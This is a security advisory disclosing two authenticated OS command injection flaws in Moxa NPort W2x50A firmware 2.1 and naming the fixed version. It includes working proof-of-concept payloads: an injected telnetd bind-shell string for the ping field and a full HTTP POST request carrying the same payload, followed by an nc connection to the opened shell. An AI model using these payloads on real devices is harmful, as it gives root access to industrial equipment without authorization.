Moxa NPort W2x50A 2.1 OS Command Injection

`  
Moxa NPort W2x50A products with firmware version 2.1 Build_17112017 or lower are vulnerable to several authenticated OS Command Injection vulnerabilities:  
  
#1 Authenticated OS Command Injection in web server ping functionality  
  
Reserverd CVE ID: CVE-2018-19659  
  
A specially crafted HTTP POST request to /goform/net_WebPingGetValue can result in running OS commands as the root user. Exploitation required authentication. This is similar to CVE-2017-12120.  
  
Proof-of-concept:   
1. Authenticate to Moxa NPort W2x50A device.  
2. Go to Main menu a System Management a Maintenance a Ping a Destination  
3. Enter ;telnetd -l/bin/sh -p4444&;. in 'Destination' field  
4. Connect to opened bind shell: nc $IP_ADDRESS 4444  
  
#2 Authenticated OS Command Injection in web server wlan profile properties functionality  
  
Reserverd CVE ID: CVE-2018-19660  
  
A specially crafted HTTP POST request to /goform/net_WebSettingProfileSecurity can result in running OS commands as the root user. Exploitation required authentication.   
  
Proof-of-concept (sample HTTP request opening bind shell on port 4444):  
  
POST /goform/webSettingProfileSecurity?profileID=1 HTTP/1.1  
Host: {IP:PORT}  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: SessionID={YOURSESSIONID}  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 309  
  
Authentication=3&EAP_method=1&Username= ;telnetd -l/bin/sh -p4444&;  
  
These vulnerabilities were fixed in the firmware version 2.2 Build_18082311.  
https://www.moxa.com/support/download.aspx?type=support&id=14781   
  
  
Best regards,  
Maksim Khazov  
  
  
`